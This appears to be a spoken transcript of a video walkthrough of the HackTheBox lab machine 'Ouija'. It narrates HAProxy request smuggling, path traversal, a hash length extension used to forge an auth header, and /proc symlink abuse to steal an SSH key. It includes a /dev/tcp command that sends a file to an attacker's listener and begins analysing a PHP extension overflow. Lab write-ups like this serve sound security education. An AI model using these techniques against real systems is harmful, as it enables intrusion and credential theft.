What's going on YouTube? This is Ipsec. I'm doing Ouija from HackTheBox, which is a very particular box because there are two exploits, both are integer overflows, that the data you send it is very, very particular. A very small mistake will just mean the exploit doesn't work. The first one is in HA Proxy. There's an integer overflow there that essentially lets you smuggle in a second HTTP request. And that second HTTP request gets processed after it does the ACL checking. So if there's any ACLs blocking you from trying to access a URL or domain in HA Proxy, this way bypasses it. So you can use that to access the dev domain that has a file disclosure vulnerability that leaks some source code to another app. There's a hash extension attack there that is relatively easy to perform once you notice it's there. And then the root step, they actually coded a PHP library that has an integer overflow that enables you to do a buffer overflow. And how you just do this is very wonky. It's hard to explain, so let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, -vv for double verbose. This is going to give us the TTL and things like that. OA output all formats, put in the nmap directory and call it Ouija. Then the IP address of 10.10.11.244. This can take some time to run, so I've already ran it. Looking at the results, we can see 3 ports open. The first one is SSH on port 22, and its banner tells us it's an Ubuntu server. The next thing we have is HTTP on port 80. Its banner tells us it's Apache, but the interesting thing is we have a TTL of 62. Everything else is 63, so we know Apache is behind an extra service. There's an extra network hop here. Maybe it's a proxy, maybe it's Docker, maybe it's a firewall. We don't know exactly. We just know the packet is making an extra hop when it talks to Apache, which just is interesting. What I would normally do here is try to match up these banners. So I would take like 89p1 Ubuntu 3.1, and we'd go to this Google like Launchpad. And from here, it'll tell us what like Ubuntu version this is. And then we can look at Apache and see if that version matches up. So we see this SSH goes to Jammy. We click on Jammy, then we search for Apache, and then we can look at Apache 2. And we see it is 2452. Let's see, 2452. So it looks like if this is a second box, Docker, or whatever, it is running the same distribution as the host. Every now and then, because people don't update Dockers as much as the host OSs, you'll find really out-of-date things in Docker environments. So it's always one of those good things to check. But hey, this is the first time the double V flag actually caught the TTL. I really do like adding this flag. So this is just the default Ubuntu page. And then we have the third port is 3000. It's HTTP, and it is the Node.js framework. So let's just start off with checking out 10.10.11.244. It is the default Ubuntu page, so there's not much we can do with this. So let's do 10.10.11.244 port 3000. And we just get, looks like some type of API. I always like just viewing the headers in Burpsuite just because it's what I'm familiar with. You could use curl, but hey, stick to what you're familiar with, right? So if I go here, why is the proxy not showing? That's the second time that's happened. View, restore default tab. Okay. So refresh this, send it to repeater, look at it. We can see X powered by Express, nothing really too fancy here. So what I'm going to do is fuzz for additional endpoints. So let's do a FFUF, and then we can say -u for URL, HTTP 10.10.11.244 port 3000. Then I'm going to do a fuzz in all caps, word list, opt, sec list, discovery, web content, API. And then I'm going to do, let's see, the API endpoints, and then -res. The difference between like API endpoints and API endpoints -res, let's just show that real quick. If we do a less on this one, we see it's just words. If we do it on the previous one, we have like /API v2 with full paths. I don't like doing full paths. So let's just do this. We run it. I'm going to filter the size out for 31 because that's what we're seeing the most of. And we see it's case insensitive, right? Because register and register both work. So let's take a look at register. So we do get register, and the message is disabled. We could try sending a post because normally registration's a post request, and we can't post there. So let's change it back. There's a login. So let's go to login. It says uname and upass is required. So I'm going to do uname is equal to IPsec and upass is equal to nothing. And we get disabled. It is under development. So there's not much here. And this next step I really hate in the box. I don't know how we missed it, but you have to do the virtual hosting that's in every box. But normally there's like a redirect or a thing telling you Ouija.htb. In this case, it's just the box name. I know it sucks, but bear with me. The box does get pretty interesting after this. So let's add 10.10.11.244 Ouija.htb, save this. And now when we go to Ouija.htb, which is just 10.10.11.244, I don't want to go to Google. Let's turn Burpsuite intercept off. Ouija.htb, we get the actual page. So this is, looks like a just regular page. I'm going to check, do I have my Wapalizer? Looking to see if it detects any type of like content management system, what technologies on the box. Don't really see anything too interesting. If we look at services, technical support, design, perfect, pricing, it looks pretty boilerplatey. Contact us, nothing here. If we look at the page source to see if there's anything interesting, I always like looking at the headers to see if it leaks anything. This just looks like standard bootstrap. And then I look at the footers generally. And we can see there is a tracking script. And we would have seen this if we looked at Burpsuite as well, if we went to like HTTP history. Let's see. It did make a request to get Ouija HTTP here for a tracking.javascript, right? So we would see it multiple ways. You could look at source or through Burpsuite, but we have another domain. So let's check this out. So let's do sudo v etc host, and then we can add get Ouija HTTP, get.ouija HTTP, and we get a get page. Now, since we have a domain, I always like doing a domain brute force. So I'm just going to do, we'll do a FFUF with this one. We'll do FFUF -u HTTP Ouija HTTP. It doesn't really matter what we put here because we're going to manually write the host header. So we can just do 10.10.11.244 -h, and this will be fuzz.ouija HTTP, and then the word list will be opt sec list, web content discovery, or is it discovery raft? What is it? It's been so long since I did this. Web content, raft small words, and DNS names are not case sensitive, so we can specify the lowercase. Let's see, we did that, -h. We need to make this a host header, like that. Okay, so what do we want to filter for? Probably going to be size 10671. And we get dev and development gives 403s. Everything looks like starting with dev, we get a 403, which is interesting, but we'll get to that in a minute. Let's check out get If we try to register an account, looks like we can. Let's do ipsec root at ipsec.rocks, password, and we have nothing here. We could try like some type of, see if like get runners and things like that are enabled, but let's go just explore. And you don't actually have to be logged in to see this. So you could also be logged out and see it as well, but we can see there is a repository. Looking at users, we have Leela at Ouija.htb. Looking at organizations, nothing found, but let's go take a look at this repository. So we have just one commit, so there's no point in like going back to previous commits to look for secrets. This looks like, let's see, contact form lib index. Is this going to be the homepage of the site? It is looking like this is the homepage. But if we look, they have installation instructions. and they say PHP 8.2, which is a bit odd because there is no PHP on this. Maybe the contact form? No. So odd they're running PHP on a static website. Apache version. Then they're doing HA Proxy. So let's take a look at HA Proxy, see if there's any exploits there, because they do specify the version. So we do HA Proxy exploit. We probably should specify the version as well, but normally I just look at the software first and then I narrow it down to versions. So here's one, CVE 2021-4036. Let's see. It was fixed in these versions. Let's see, what version are we running? 2216. So let's see. So it's fixed in 2217. We're on 2216. So we are vulnerable right here. So we want to read this whole blog post, and this is going to be a lot to read. I'm not going to go over it. It is an integer overflow. I don't fully understand it, but let's see. We can kind of explain it. So we have a request, and HA Proxy, you can bundle up multiple requests in one big one. And what they're saying is, if there is a deny, there's a way to bypass that with this integer overflow. They specify the content length twice, and there's two passes that HA Proxy goes through. The first one is where it checks the ACLs. So it's going to read this whole request, and I think it processes this content length here, because this byte right here that I'm going over is going to be 60. So it reads this as the data portion the first time. So it never actually checks this URL to see if they're allowed to access it. Then the second pass HA Proxy goes through, it's going to use this host header, which is a overflow, I think, and gets translated to 1. So this kind of gets just dropped. There's no body here. And then this content length goes down here. Well, this isn't used anymore. It only reads the first one. And then it does the second request. So we just completely bypassed the request because HA Proxy splits it up. So the first thing is we have to find out where we're being denied from. And if you remember, everything that began with dev, we have a 403. So if we look at this, let's go and make a request to dev. I'm going to do this over in repeater. So this is a normal request to 3000. Let's just rename these. We'll say port 3000. This will be homepage. So let's change this to be a /. And this is just Ouija HTTP. We'll change this target to be on port 80. We go here. You can see all these headers. Now let's make one to dev. And we don't have the server header anymore, right? Over here, we have the server as Apache. Over here, we don't. This one, we don't have the server header because it's Express. This is probably just running straight Express, not going through any type of proxy. And keep in mind, this port 3000 had a different TTL than port 80. So it looks like maybe HA Proxy is listening on port 80, and then Express, again, is on port 3000. So this bolsters the claim HA Proxy is the thing that's denying us because the header of Apache is missing. We could also just go and change the host header to 10.10.11.244. We got the standard page. And again, you have the host header of Apache. If you've ever tried just removing the header of Apache, it's very hard to make Apache not advertise as an Apache server. You can make your own like module and remove it that way, but standardly, they don't let you do that, I don't think. You can either like say Apache or you can remove the version, but you can't remove it altogether easily to my knowledge. So this really bolsters the claim that HA Proxy is a thing that's denying us, and it's not going to be an Apache rule because it's not advertising as Apache. Well, I talked about that a lot longer than I think I needed to, but hopefully you're getting the value of this recon. So let's go back to this now. So we know a request we can't go through. We want to try to test this out. And maybe easier if I just run this through and we walk through it instead of reading the blog post, because you should pause the video, read the blog post, and then see me explain it and point out what I get wrong, or maybe you enjoy the explanation. So I'm going to copy this request. We're just going to send it here. We'll paste it. Whoops. Paste it here. And let's do a get on / the host Ouija HTTP. they're missing one of the content links. This one. There we go. Like this. We don't want the exported for. I think this is fine. Let's do dev Ouija HTTP. We don't need that. We don't want any data on those lines. Okay. So the last thing we're going to have to change, and I think this just is one line break here, is to tell Burpsuite not to auto-update this content length, because if I send the request now, we see it auto-updated to 39. So I'm going to click on this gear icon and tell it not to auto-update. So now if I set it to 0, it's going to behave like that. And I guess we can kind of see it somewhat work. Something odd happened right now. I did not expect that, but we have a 400 bad request and then a data forbidden. So it did separate both of these, but the second request went to dev, so we didn't exploit it, right? Because it processed the reject rule. If I change that to get T, we're not getting a double thing. We're just getting bad request. That is really bizarre why it did that, but okay. So what we want to do is set this content length. And the content length is this data here. So I'm going to go to the end of line 9. I'm going to hold shift and then hit up. And then once I highlight this, hit up one more time. So we get the full length. And the content length of this header is going to be 41. So we can send this. If I send this a bunch of times, we'll see if anything ever changes. We may have to put some data at the end to trigger it. I always see Ouija. Let's just put some junk data here. Hit. Oh, I just saw it right here. We're kind of abusing kind of a race condition with which one it responds to first, right? Here we definitely have Ouija dev. We can make this a little bit more reliable by, well, before we make it more reliable, let's show that if we swap this and did the dev first, it's always going to get forbidden. It never works because, again, how this exploit is working, it processes this packet in 2 waves, or I forget the site, like 2 cycles, right? The first one is it's going to read this. It sees, oh, dev is here. That's on my reject rule. I'm not going to allow it. When we did it this way, right? The first pass, that's the word I was looking for. The first pass is going to read this. It's going to see, it's going to ignore this content length, sees 41. So it's going to treat all of this as one HTTP packet. And because this is in the body, according to pass 1, it's not going to see this dev and reject it, right? Because it's in the body. It's not in the HTTP request. But during the second pass, when it's actually going out to make the HTTP request instead of just examining the data, then this header gets ignored. This one gets used. This is an overflow. It's going to just get set to 0. So this whole body doesn't get treated as a packet. And the second pass separates this into a second HTTP request. And since it's on the second pass wasn't doing any checking of the reject rule. So it passes and gets access. So that's why having dev, the second one, matters. Now, this next piece, I can't really explain. If we put a third packet in here, so if we did get/HTTP11, and I think we just do 1 line, maybe it's 2 lines. We have 18272. This is just the response of index. I'm going to add a second line. Now, 191144. And it's going to be that every time. So if we go down to the bottom, all the way down, we can see the second request gets here, and we have Ouija dev. So this, like, you could do it without this one, but it's not reliable. You just make the request multiple times, and eventually you win the race, or you just add this, and then it's always appending to the bottom. I don't understand what's going on in HA Proxy, but it is interesting, right? So we can see this Ouija dev. If we wanted to, we could just copy this. Let's go v, let's make dir, we'll call it dub. I already have a dub. Oh, typo in the command. My brain just saw like exit with error must have already existed. I'm just going to call it index.html. We'll paste this in. I probably should have done set paste. It may be a bit better. It still looks ugly, but let's open this up in Firefox and we can look at exactly what it looks like. It's just got this app.js and init.sh. So let's take a look at what this looks like. So we do file is equal to app.js or file is equal to init.sh. Let's try init.sh first. What's the path? We want editor, PHP, file, whatever. Okay. So I'm going to go to before the G, holding shift, up, here, one more. So my cursor's on line 5. That data is 64. So I'm going to put 64 here. And then I'm going to copy this. Or we can just copy, yeah, the header's good. So I can quickly get to it. 19, that's good. Paste this in. I'm going to click the gear here, auto scroll to where text matches. And we can see init.sh right here. So I'm going to copy this to file. So copy to file. I'll call this init.sh. And we probably should make a directory. I'd make it files. MV files up 1 because I'm in dub. Move init.sh to files. Okay, so we can see how this is working. That's weird that it just directs it to nothing. So config start, I'm guessing that should be like to a log file. We're making a directory config.bin, config.local, config.share, and verlog zapi. Now we're going to cat opt auth API key. So we probably should try to read this API key, right? We have credentials, bot1 and bot. So if we wanted to, we could go back here to port 3000, where we get login. Uname is equal to bot1, and upass is equal to bot. It's just disabled. We have a hash, and then we're symlinking /proc to config bin process informations. So I'm guessing this API needs to read something about the process information. I don't know exactly what this is doing, but this goes into the proc table where like all the PIDs and stuff is. And then we say config is done and exit. So let's try grabbing opt auth API key. So I'm going to go back to here and I'm just going to call this LFI. And let's do file. First, I'm going to do etc passwd. We want to make sure we can like do directory traversal, right? So we do one file that we know exists. That length is 68. And let's see. I'm going to search for text editor, so we always go to that. Go here, text editor, etc passwd. We don't see anything. So we'll do 2 ... slashes. And now we are at 74. Still nothing. Whoops, I erased 1. Nothing there. Let's do another. So I added 3. That should be 76. It doesn't look like we can get out of our directory. We added 1. Oh, we can. So we have to go up 4 directories. So that's probably var HTML or something. And we got to passwd. So now we want to get to, what was it? It was opt API something. Opt auth API key. So opt auth API key. And we're at 85. 84, 85. Nothing. So the other thing I want to try checking is, can we see if like directories exist? What if I just gave it Etsy? And man, maybe I should really automate this. 72. Nothing? Okay. So it doesn't show if like the directory exists or not. I don't know what you can do with that, but API key doesn't look like it exists. So let's try grabbing the API.JS. I think that was the other one, API.JS. So this is 63. Text editor. App.js. That was it. Not API. Okay. Let's copy all this to a file. Burpsuite's going to show it in horrible highlighting, but if you copy to file, I think it'll be better. If I can type, what was it? I called it app.ja. So, okay, we have app.js. The other thing I want to do is try including editor.php because I want to see if this is a LFI where it's an include or it's just a file disclosure vulnerability. So let's include editor.php, the self. So this is going to be, yeah, we can do this. Probably should do index.php. Does that exist? Unknown host, what? Oh, yeah. We never added dev to our host file. We've just been manipulating it this way. Index.php had to exist, right? Let's try it real quick. It could have been HTML, I guess. This is 50. There we go. That's not good. Oh, we created a new tab, so it auto updated the content length. There we go, 1944. Okay, index.php exists. So this is the one we want to look at. The reason why I don't want to include editor, because we include editor, then it includes editor again, and we get into an infinite loop. So it's always best not to include the file that's doing the inclusion. Let's see, this is 66. Index.php, let's add a .. because maybe it's going into like the files directory. So we add 3. Text editor, index.php. And let's see. I don't see any PHP tags, but this looks like it's a static page, so that's not a good one to do. Let's roll the dice and include itself. So let's include editor. This is going to be 70. And I see a PHP tag. So this is not a file include. It's just a get file contents call, right? Because we're seeing the PHP code, so we can't get code execution here. So the only thing we're left with is reversing this app.js and maybe finding other files there, but let's figure out exactly what app.js is. Opening it up, we have the Express.js app. And since it's on port 3000, I'm going to assume this is this application, right? Because they're both on port 3000. So we can look at it. We have function D, and all it's doing is taking base 64, undoing it, then undoing hex and returning what that is. So I'm going to guess maybe like D is decode. I would say decrypt, but I mean, it's base 64 and hex. So I would guess D is decode. We have generate cookies, and we're creating a SHA-256 hash. We're going to update it with the key, and the key is process.env.k. So I'm guessing this is the opt API key that we can't access, right? And it makes sense we can't access it because the TTL, right? The web server had one of 62, which indicates it's probably in some type of container or a different host. And the port 3000 had 63, so we know they're not on the same host, so we can't read the API key. It's odd that this application source was on the container, but That's a question for another day, right? So we have the key, and then identification. Identification, let's see, where is that? Identification, where are you? That comes from the header, right? Q headers identification. And then we do this hash, which is a SHA-256 digest. So this is vulnerable to a hash extension. You should always, when doing these things, use like HMAC. And if for some reason you don't use HMAC, reverse this order and put identification first and then the key. Hash extension attacks work because I don't know, it's been so long since I talked about it, but when you hash a string, if we had I want to hash this, it takes it in blocks. So let's say we did that, then this, right? So we do the hash and we're just hashing in blocks and we have this. And if we knew this block and what the output was, then we could keep continuing and just keep hashing it, right? I guess this would be all zeros, right? So if we knew like the output of the hash, if this was if that's the hash, then we could add to the string. So we could add data, right? And then just continue the function it is doing hashing with the output. And we'd get a new hash, but we'd still be able to validate it. So that's going to be the hash length extension attack. So that's why you always put the unknown piece last in that hash. If the known piece is last, then they can continue it, right? What's stopping if you did it the other way, if the key was right here, since I don't know the last block, then I can't continue it because I don't know what created the last block. The only reason I can continue it is because I know the previous block. Maybe that makes sense. Maybe it doesn't. Let me know in the comments. But we see that validate cookies. That's easy. Ensure authentication. So we need the iHash header and the identification header. We got login, register, users, and a file get. So I'm going to start with this users, even though I know as soon as we pass ensure auth, we go straight to databases unavailable. But this tells me my Q and R is correct, and I understand exactly how the authentication is working. So let's go back here and say get users. iHash header is missing. So we want to add the iHash. And then it's probably going to say identification header is missing. Okay, invalid token. So we got to get iHash and identification. And if we went back to init.sh, let's see, we have hash and ID. So if we grab the hash and put that, and then identification, they have bot1 bot, invalid token. Oh, and that's because if we go back to app.js, let's see. How is it validating? We do generate cookies, then decrypt identification, or decode, I guess. We got to hex it and then base64 it. So let's do echo-n bot1 bot, then xxd-r-p. Is it RP, like that? Okay, xxd-p. We don't want R because that's reverse. And then we base64. Okay. So identification, like this. And we get insufficient privileges. That's odd. So I guess this source isn't identical. Ensure auth, log in. Because I would guess we get database unavailable, but okay. Insif? Nope, that does not even exist. But we validated this. So let's try getting file get. So if we attempt to do a request to file get, we have insufficient privileges. Oh, right here. It was a capital I. So we only ensure auth or validate auth if the identification includes : admin true. Let's see. And what we have, well, I know this is stupid. We could just look at what we had. We have bot1 bot. So what we need to do is have our identification become bot1 bot. Let's see, where is it? Let's just do this. So we need to make, is it like that? Is that the string we need to make? If we cat admin and capital T. So we need this string, right? And we can't just use this because that's not going to match the hash, right? I'm guessing as soon as I paste this, we're going to get a invalid hash, like invalid token. So we need to do the hash length extension to create a new value with this. So let's do that. I'm going to go and Google hash extender, and then this repository is the one I normally use. We can get clone. Okay, go into hash extender. And then if we just do a make, we should have hash extender here. So now we want to run it. Let's see the instructions here. There's a blog post that talks about it. Let's see. What are the functions? The tool. Okay. So we need data, original signature, append, hash format. So the data we know, this is going to be the known plain text, right? We'll do bot1 bot. And then the original signature, that is going to be this. Then we want to append admin true. The format was what, SHA-256? And we don't know the length of the secret. So I'm going to do a secret min is equal to 8 and a secret max, we'll do 32. If we don't get any hits, then I'd increase it. And this produces all the valid things. So we have the new signature here. And this is going to be the same for all of them, right? If I just grep on new sig, it's all the same. So we can put this signature here. And then the identification is the new string. So we could go through and paste all of these until we get something better. Do we have to base 64 encode? We do. Because that's hex. I don't think we, yeah. I think we just do echo-n base 64 W0, I think. So this is what we're going to have to do and go for every one. And you know, I don't like doing things manually like this. So invalid token, that makes sense. So what I'm going to do is use FFUF. And the reason why I'm not going to do a -- request and file in proto is because it's on port 3000. And I actually don't know when giving FFUF, maybe it will obey the host. I don't think it does. I don't know how it knows the port, but let's try this. What I'm going to do is we're going to run this again and then grep for string. Then we're going to awk print. Let's see, this is 3. Okay. We can say for I, let's just output this to a file. So this will be strings.out. Okay. For I in cat strings.out, do echo I. I want to make sure it's reading it by line. It is. So you can do echo -ni base64w0. And this will be encoded strings.out. Okay. And let us copy this to a file. So let's see. Where is it? Copy to file, Ouija. We'll do file get.request. V file get. And the identification is what we want to change. Let's make sure that hash is correct. New string 14b C0b. Okay, that looks good. So let's see. We have that. So we can do FFUF request proto request file get.request request proto HTTP -w hash extender. What do we call this? Encoded strings, I think. Yep. Encoded strings.out. Okay. So let's filter size for 15. Oh, it does work. So I guess it does read the port from the file because we had the :3000 in the host. And we have this one. So if I send this over, we have file is I is required. So if we do $file is equal to, was it app.js? We get the source code of the app. So what I want to do is see what like the length of this hash. So what we can do is grab this and we can say echo -n base64-d. We got to paste. Okay. Then let's go back to hash extender. This is here. Request file. Is it? There we go. The length was 23. So it was this one. So let's see. Let's try to get the, what is it? Opt, freecat init. It's in files. It was opt auth API.key. Auth API key. Action not allowed. So if we look at this, we do a file get. So if the file starts with a slash, has 2 dots, or 2 dot, I don't know why it does 2 dots and 2 dots and a slash, but then it gets action not allowed. So this is a path traversal fix. We could just try, was it opt? Maybe API.js is in opt. So we could try just doing like auth API.key. No directory, I guess. So there is no API key here. Now, the really weird thing is, we went back to init.sh. Remember, they created this symlink from proc to config bin process informations, right? So if we put the config bin process informations, we're going to be in /proc of the box. So if we do ls/proc, this is where we are. So we could do lsla proc self. Oh, shoot. Do that. There we go. And if we look, proc self has a root that points to /. So by using this, we can abuse the symlink and get to the root. So we do this. This is called open. We probably have to give it a file, etc passwd. That did not work. Let's see. Config bin process informations. Why is that not there? Proc self cat root etc passwd. That does work. Let's see. I guess we have to find where this process informations is. Let's re-look at this symlink. We map proc to that. File. That works. Isdir. So that is bin. That's a directory. If we go to this, doesn't exist. I'm looking at the code. Okay. Let's try this. I bet I added a proc. So that's a directory. Self, that's a directory. I probably did this, then proc self. That's probably what I was doing. So we do this. That's a directory. Root, directory. Now I can do etc passwd. And there we go. We have it. So if I look at this, we can just do a printf. And we get it. So this is going to be the passwd of the box. We could grep for everything that ends in sh to get all the shells. And there are two. We have root and Leela. But let's get the actual key, right? So let's try, what is it? Self opt AP, auth API.key, I think it was. Cat init.sh opt auth API.key. No? Oh, we don't have root. Access. So there's a file. We just don't have access to read it. So we can't get the key. Let's see. We could do, instead of root, we can do environ. And if we look at this, we can see we're executing as Leela. Our home is home Leela. So might as well try seeing if Leela has an SSH key, right? So let's do home, Leela, and I have to do root, home, Leela, SSH, ID, RSA, and Leela does. So let's go ahead and add this. And I showed you the printf. We could also just copy this whole request. Let's just copy this to file. So this will be Leela response. We'll do Leela sh.resp for response. So if I cat this, this could just be parsed with JQ, right? And then I could do JQ.message, We could also add a -r for raw, and there we have it. So we can just say Leela.id.rsa. We can say SSH, so let's do chmod 600. And now SSH-I. And then Leela at 10, 10, 11, 244. And we get into the box as Leela. So let's take a look at a directory. We do have user.txt, but there's not much there. If we do a find on .local, it's just nano stuff. So it's probably just files they edited here. What's in here? Nothing. So the first thing I always like doing is looking at the running processes. And we can see, we can only see the processes owned by us. And that's because, let's see, what is this? It's like hide proc, right? /proc is mounted with hide PID. So we can't see processes of other users. We can tell Docker is definitely running on this box because if we look at the mount command, we have all these Docker things. And that makes sense because we did have the web server with a different TTL. So I'm guessing the like port 80 stuff is in a Docker container. So since we can't see running processes, I'm going to check for ports. And we can see a handful of ports are listening. We have a bunch of Docker ones. I say Docker because this is the default like Docker network 172.17. But I see 8080 on localhost that we didn't see. I also see quad 9 on localhost. So I'm going to go into Etsy. I'm going to do a grep-r on 4 9s and see where this exists. And it is in this start PPH service. So if we cat this, let's grab this, cat, we can see there is a PHP web server running on localhost quad 9, and this is the home directory. We'll come back to this in just a minute. I want to see what's 8080 real quick. And it looks like there is a Apache virtual host. Oh, HA Proxy is running on 8080. So there's probably some IP tables rule or something like mapping port 80 to 8080 or something odd is going on there. But that is what 8080 is. Okay, that makes sense. So let's go to this PHP directory. So if we go in here, this is what's listening on localhost 9999. If we do a lsla, it is all root. Can we write anything here? So silly thing, but this is always one of my first things, is I check if there's any writable files, and there is not. There is this .debug. What is that? And maps. The memory maps. Okay. Don't know what that's about. Before we look at the source, I do want to just poke at the server and see what it looks like. So I'm going to do a local port forward. So 9999, 127.0.0.1, 9999. If you don't know how I got that prompt up, if the very first thing you ever enter on a line is that squiggly C, it will drop you in that SSH thing. So now on my box, on localhost 9999, we get this. I'm guessing my Darkly is messing with it, but admin password, we try logging in, and I don't know what just happened. We just got a white screen. So let's go take a look at this index.php. Okay, testing login. Nothing interesting there. So including utils debug.php, I'm guessing that's why the debug directory got created. If is set username password, then we go here. I don't know what this say lverifier thing is. This is not a standard PHP thing, and I would go on the internet and look at it, but I'm sure we'll just come up with like spoilers of this box. But my first thing would be Googling what a function I don't know is. We're sending it the username and password, then we're starting a session, and then doing something. So we want to figure out what say lverifier is. It may be in that utils debug.php. So I'm going to go up one. Let's look at utils, debug, and let's see. We make the debug, we copy maps to it. I don't know what that's doing. So let's just do a grep -R say _lver, because I don't want to type verifier because I may make a typo. And the only thing we see is it in there. Let's see. I wonder if there's any like lverifiers. So we do see this map file, like this library, userlib php 2022-0829 lverifier.so. If we do a strings against this, it is a library, and it's in a PHP module directory. And we can see it's probably compiled with debug because we see the file names of the program: home, Kali, desktop, programming, challenges, HackTheBox, machine, dev, Ouija, vulnerable PHP extension, PHP source extension, lverifier.c. So the first thing is I want to see if this file exists on this box. So do find -name, see if we can grab that C code, because if we can, then we don't have to do any reversing and our life is easy. Unfortunately, we can't. So we want to grab lverifier.c, or the whole library. So I will cat this to dev tcp 10.10.14.8 9001. Let's stand this up, nclvnp 9001 lverifier.so. Okay, we can send it, and there we go. If we wanted to confirm this is actually loaded, we could go into etc php. It's 8.2. Let's see, mods available. And there's probably a lverifier or something. Let's see, grep -r lver. No, I thought it would be there. We do see it in the CLI php.ini. We have lverifier.so here. So that's where it's loaded. It's not in a module for some reason. It's in the PHP config. Let's go into CLI. Let's see. I'm going to grep-v every line that starts with a semicolon to remove it. And then show me only lines that have things. So here, I just want to look at the PHP config, see if anything sticks out. Extension lverifier.so. I know that's not default. And then we have a lot here. So, okay. I guess we have to get to reversing this library, which is the part of this box that I do not look forward to because it is not the easiest to reverse. Trying to think of the first place we want to start. I guess we can load it up in Ghidra. So do opt Ghidra, Ghidra run, and we'll load this up and look through it. It's going to be relatively hard to spot. It's easier to debug and then like kind of fuzz it. I mean, it's always going to be easier to fuzz than statically analyze it, but we'll try to fully understand what's going on here. I don't think we will, but hopefully you'll have an idea. So let's open this up, lverifier.so. Okay. Analyze it. Yes. Okay. Okay, so let's go to the exports. And then if we do, let's see, say lverifier. This is the function because we call say lverifier. And it goes to validating user input, and we have local 28 and 18. Let's see, when we say lverifier, we gave it a username and password. So we can rename these real quick. And then let's go in validating user input. And again, username, password. Okay. So if we look at this, we have this svar getting the length of the username. So we'll do len username. And then local 660 is just null. 678 is going to be var log verify. So this will be, I'm going to call this log path, I guess. That's annoying. How it like split it up into two. I probably could fix that, but we'll just move on. Okay. Right here is going to be where all the magic happens. This is going to be a, I want to say it's an integer overflow, but it may be an integer overflow, underflow. But right here, we're taking the len username, and it's just size t currently. Let's see, up here, size t. So this is just an unsigned int, I want to say. So it can be very, very big. But we take the short of it, which is going to be 16-bit. So it's probably going to be like either, let's see, what is this? We go from a length of 8 bits to 2 bits. So if we give it a large integer, it will go back down to like -1. I'll show that in a second after we go through this, but I just want to go here and let's call this len username. We'll do short len username. And this isn't exactly used anymore in the program. It screws up the stack. We'll try to visualize it in the debugger. But essentially, we'll get to it in a second, I guess. Keep getting ahead of myself. So here we have session equals 1 equals user root version beta type whatever. This is the data that gets written there. I bet if we went to the box, let's go here. If we cat var log, is it lverify? Do we not have access to it? I don't see the log file. Okay. This is the data it's writing to the log. So we'll say log data. I hope those are the right variables. Okay. So in here, if we have a username that's longer than 800, it's going to do this. This is essentially a mem copy. I think if you analyze this in IDA, it would say like Q mem copy or something. But what we're doing here is doing a loop 100 times. This is a pointer that's 8 length. So 100 times 8, we go through 800 length, right? So this is just copying all the data to a location if it's greater than 800. And a lot of this stuff, we can go to the end. So I don't know what these 3 do. This is just doing a printf. So we're printing the log data and path. We're going to do event recorder, then the log path and log data. Then we're going to load user, log path, the short length username, and then I think that's adding on the password there. So if we go to event recorder, let's see, what is this doing? We essentially open up the file and write data. So let's talk about the whole, what is it here? This whole integer overflow thing. And then once you understand this, we'll talk about exactly what is happening there. So let's go back to our box. And we're going to make a sample program. Because if we try to understand what's going on in the program we were debugging, there's a lot of extra fluff and it just is hard to understand. So it's always easier to just create your own C program. And you can also include the source when you compile it so you can see the code with the assembly and fully understand what's going on. So I just want to create 2 variables. We'll do a size t. This should be 64-bit since my machine is 64-bit. If it was 32-bit machine or OS, it would probably be a 32-bit value. I will specify I definitely want a short variable, which is only going to be 16-bit. I hope it's bit. Maybe it's byte. I think it's bit. I always get those intertwined. So now we can just call define sz is equal to 65535. And that's going to be the maximum value for 16 bits, right? That's 1, 2, 3, 4, 1, 2, 3. In binary, this is what that value is. If it's a signed int, when it's all ones, it's -1 because of 2's complement. So let's do a short sz is equal to sz. And now let's just print these things out. So we'll do a printf. We'll say size t, %d, and we'll do short sz %d like that. And we also have to pass the things. Yeah. Short sz. There we go. I forgot the equals here, and that was throwing me off when I was reading it. I think this code is fine once I put the semicolon. We'll do gcc test.c. I'm going to disable all optimizations, or it disables a lot, not all of them. There's a bunch of just default ones. I'm also going to do -g so we add the source code lines. And then we'll call this test. If I execute test, we see the size is 65535, but when we defined a short variable and pass this, it gets to -1. Let's go in GDB to just look at this. So if we do gdb./test, let's break on main, run, and here we go. We can see it. The first thing we're going to do is assign 0xFFFF, which is 65,535, to this address. So we can do next instruction. And here we're going to be saving this address. So we move it over to RAX. And then we're going to write just AX over here. And this is a Q word, which is 64-bit. This is a word, which is 16-bit. And AX is 16-bit, RAX is 64. There's also EAX, which is 32, right? So we're saving that one over to there. And now we're going to take RBP minus 0xa, put that into EDX, and 0xa, this is going to be the short version. So we put the short version in EDX, and then we put the longer version, or the 64-bit version, in RAX. So I'm just going to step over these. We can also print them out. So if we do x/d RBP minus 0xa, we get -1. If we do 8, 0x8. Oh, those are the same, right? Because it's not over 10, but we get 65535, right? So if I go down and we go next instruction to the printf, we can see the 2 arguments and all the bits are on, which means it's -1. So we can continue, and it prints like that. If we wanted to, we could also go here. If we made it 65536 GCC /test. Short size is 0 again because it just overflowed it and now it starts over. Do this again. GCC. That's 1. So hopefully you understand that whole thing. And now that you understand that, what's happening here is this short length username, the debugger doesn't show it well. We'll have to, Ghidra doesn't show it well. We'll have to kind of step through in a debugger to see it. But it's changing the length that is allocated for username because username isn't passed size t, length username. Like the length of the username is getting defined dynamically. So in memory, it writes how long the username is. That way down here, when it starts jumping to things, we jump from here, which is just the, like, I don't know what this is. Okay. So let's see. Oh, this is what I wanted. I was looking at these functions. So like when we load users, we don't know where the password is. So we go to the log path, then we add the length of the username, and then that's going to be where the password is. So essentially, what this is allowing us to do is, that's not what I want. Call it notes, I guess. We have the username, the log path, and log data. And when we're doing the mem copy for the username, that is, I think, right around here, we can tell it the length of the username is whatever we want, because this is the short int, right? If we had it under 65,535, it's going to allocate correctly. It only copies up to 800. So if we gave it 65,000, it would still only allocate 800 bytes of space and write that, because that is what this is doing. However, if we went to 65,535, it thinks the username length is nothing, right? But it still lets us write the data. So we go to the stack and we only align, let's say, 1 byte of memory or whatever we want to, but we then write 800, or yeah, we can write up to 800. So that goes into these variables, and we can actually overwrite what log path and log data is. That is going to be what this whole exploit chain is about. So now that we're super confused with all this like static analysis and me poorly describing it, let's go over and do some dynamic analysis of this, because we can do that. You have to match the PHP version, and it was a pain getting PHP 8.2 on Parrot, but I built a Ubuntu machine. We have it at 58.239. So I'm going to SSH over to it. So IPsec at 192.168.58.239. And we're going to install PHP 8.2, because if I do sudo apt search PHP, let's do my password, maybe 8.2, we get nothing. So if we just Google Ubuntu install PHP 8.2, and let's see, maybe this we find. Probably not good to add people's random repos, but this is a VM that I created for this. So let's just do it the quickest way. 